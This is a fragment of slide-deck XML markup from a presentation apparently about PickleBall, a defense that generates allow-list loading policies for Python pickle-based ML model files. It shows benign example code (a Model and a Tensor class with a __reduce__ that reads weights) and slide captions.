                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>__init__</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>self</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>, weights: Tensor):</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>self</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>.weights = weights</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Tensor</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>object</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>__reduce__</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>self</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>        return (read_weights_to_tensor, (self.filename,))</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>read_weights_to_tensor</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>(filename: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>) -&gt; Tensor:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>    # Read a weights file and return a Tensor</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="763" name="Google Shape;763;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="185875" y="1786200"/>
            <a:ext cx="27567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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Python library source code</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="764" name="Google Shape;764;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5645325" y="2155500"/>
            <a:ext cx="2756700" cy="1293000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>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b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Allowed Imports:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Allowed Invocations:</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="765" name="Google Shape;765;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5607550" y="1786200"/>
            <a:ext cx="27567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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Generated loading policy</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="766" name="Google Shape;766;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2532525" y="943025"/>
            <a:ext cx="4708200" cy="755100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>A loading policy represents all callables that could appear in any pickle program encoding a valid model.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>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70" name="Shape 770"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="771" name="Google Shape;771;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Policy Generation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="772" name="Google Shape;772;p63"/>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773" name="Google Shape;773;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="185875" y="2155500"/>
            <a:ext cx="4708200" cy="1723800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>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b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Model</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>object</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>__init__</a:t>
            </a:r>
            <a:r>
